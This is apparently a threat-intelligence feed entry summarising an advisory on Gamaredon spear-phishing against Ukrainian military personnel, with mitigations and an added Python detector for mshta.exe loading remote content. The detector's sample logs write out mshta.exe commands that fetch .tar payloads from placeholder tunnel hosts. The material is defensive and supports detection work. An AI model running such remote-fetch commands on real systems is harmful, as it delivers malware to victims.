Source |
RiskIQ |
Identifier |
8573564 |
Publication date |
2024-09-10 01:04:02 (viewed: 2024-09-10 01:19:53) |
Title |
Spear-Phishing in the Battlefield: Gamaredon's Ongoing Assault on Ukraine's Military |
Text |
#### Targeted Geolocations
- Ukraine
## Snapshot
Cyble Research and Intelligence Labs (CRIL) identified an active campaign by the Gamaredon APT group, tracked by Microsoft as [Aqua Blizzard](https://security.microsoft.com/intel-profiles/9b01de37bf66d1760954a16dc2b52fed2a7bd4e093dfc8a4905e108e4843da80), targeting Ukrainian military personnel with spear-phishing emails.
## Description
These emails, which use military summons as a lure, contain malicious XHTML attachments that execute obfuscated JavaScript code. Upon opening, the code downloads a malicious archive, which includes a Windows shortcut (LNK) file. When executed, this LNK file triggers the execution of a remote .tar archive hosted anonymously on TryCloudflare[.]com via mshta.exe, leveraging the one-time tunnel feature to evade detection.
The campaign is large-scale and coordinated, with a widespread distribution of similar files, indicating ongoing activity. The attackers are employing sophisticated tactics to monitor the campaign's effectiveness, including the use of a 1-pixel remote image to track victim interactions. According to Cyble, Gamaredon has been active since at least 2013, engaging in cyber-espionage activities against Ukrainian government institutions, military, and critical infrastructure sectors.
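As an added illustration, not part of the Cyble or Microsoft write-up, the following Python scans constructed Sysmon-style process-creation records for the last link in the chain described above: mshta.exe being handed a remote URL. Hosts under the one-time TryCloudflare tunnel domain and remote targets that are not .hta files (such as a .tar archive) are ranked highest; a local .hta argument is left alone. The record layout, field names, hostnames and sample values are assumptions made for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# http(s) URL in a command line: group 1 = host[:port], group 2 = optional path.
URL_RE = re.compile(r"""https?://([^\s"'/\\]+)(/[^\s"']*)?""", re.IGNORECASE)

# Hostname suffix of the one-time tunnel service named in the advisory.
ONE_TIME_TUNNEL_SUFFIX = "trycloudflare.com"


@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    """Last path component, lower-cased, for either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> ProcessEvent:
    """Parse one constructed, tab-separated 'Key=Value' record (assumed format)."""
    fields = dict(part.split("=", 1) for part in line.rstrip("\n").split("\t"))
    return ProcessEvent(fields["Image"], fields["CommandLine"], fields["ParentImage"])


def classify(ev: ProcessEvent) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for suspicious mshta.exe use, else None."""
    if basename(ev.image) != "mshta.exe":
        return None
    m = URL_RE.search(ev.command_line)
    if m is None:
        return None  # local .hta argument: out of scope for this detection
    host = m.group(1).lower().split(":")[0]   # drop an explicit port
    path = (m.group(2) or "").lower()
    if host == ONE_TIME_TUNNEL_SUFFIX or host.endswith("." + ONE_TIME_TUNNEL_SUFFIX):
        return ("high", f"mshta.exe loading remote content from one-time tunnel host {host}")
    if not path.endswith(".hta"):
        return ("high", f"mshta.exe loading non-.hta remote content from {host}")
    return ("medium", f"mshta.exe loading remote content from {host}")


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Run classify() over records; returns (severity, parent process, reason)."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        verdict = classify(ev)
        if verdict is not None:
            alerts.append((verdict[0], basename(ev.parent_image), verdict[1]))
    return alerts


def _rec(image: str, cmd: str, parent: str) -> str:
    return "\t".join([f"Image={image}", f"CommandLine={cmd}", f"ParentImage={parent}"])


# Constructed sample records; hostnames and paths are placeholders, not real IoCs.
SAMPLE_LOG = [
    _rec(r"C:\Windows\System32\mshta.exe",
         "mshta.exe https://placeholder-tunnel-name.trycloudflare.com/placeholder.tar",
         r"C:\Windows\explorer.exe"),
    _rec(r"C:\Windows\System32\mshta.exe",
         r"mshta.exe C:\Program Files\Vendor\setup.hta",
         r"C:\Program Files\Vendor\setup.exe"),
    _rec(r"C:\Windows\System32\mshta.exe",
         "MSHTA.EXE http://intranet.example.test/app.hta",
         r"C:\Windows\explorer.exe"),
    _rec(r"C:\Windows\System32\mshta.exe",
         "mshta.exe https://cdn.example.test:8443/stage/payload.tar",
         r"C:\Windows\explorer.exe"),
    _rec(r"C:\Windows\System32\notepad.exe",
         "notepad.exe https://docs.example.test/readme.txt",
         r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for severity, parent, reason in scan(SAMPLE_LOG):
        print(f"[{severity}] parent={parent}: {reason}")
```

The parent process is carried into each alert because, in the chain described, mshta.exe is launched by a shortcut the user opens, so a parent of explorer.exe alongside a remote URL is the combination worth triaging first.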
## Microsoft Analysis
The actor that Microsoft tracks as [Aqua Blizzard](https://security.microsoft.com/intel-profiles/9b01de37bf66d1760954a16dc2b52fed2a7bd4e093dfc8a4905e108e4843da80) is a nation-state activity group based out of Russia. The Ukrainian government has publicly attributed this group to the Russian Federal Security Service (FSB). Aqua Blizzard is known to primarily target organizations in Ukraine including government entities, military, non-governmental organizations, judiciary, law enforcement, and non-profit, as well as entities related to Ukrainian affairs. Aqua Blizzard focuses on espionage and exfiltration of sensitive information. Aqua Blizzard's tactics are constantly evolving and encompass a multitude of advanced techniques and procedures. The actor is known to primarily use spear-phishing emails with malicious attachments that contain a first-stage payload that downloads and launches further payloads.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Turn on the following [attack surface reduction rules](https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction) to block or audit activity that can be associated with this threat. Then check the security recommendations card for the deployment status of monitored mitigations.
  - [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion)
  - Block JavaScript or VBScript from launching downloaded executable content
  - Block the launch of potentially obfuscated scripts
- Sysmon can be configured to detect if *Cloudflare Tunnel* is being staged on a system. If *Cloudflare Tunnel* is detected, Sysmon persistently deletes the utility. Sysmon also creates a Microsoft Windows event corresponding to this detection. Download [Sysmon v15.0](https://learn.microsoft.com/sysinternals/downloads/sysmon?ocid=magicti_ta_learndoc).
- Sysmon can be configured to use a configuration file with the FileBlockExecutable directive. Systems installed with Sysmon can use this configuration parameter to effectively block writing of executable files to sensitive directories, such as default domain policies within SYSVOL. Sysmon creates a Windows event that corresponds to this detection. Download [Sysmon v15.0](https://learn.microsoft.com/sysinternals/downloads/sysmon?ocid=magicti_ta_learndoc).
- A script auth |
Rating |
★★
|
Sent |
Yes |
Tags |
Spam
Malware
Tool
Threat
Legislation
|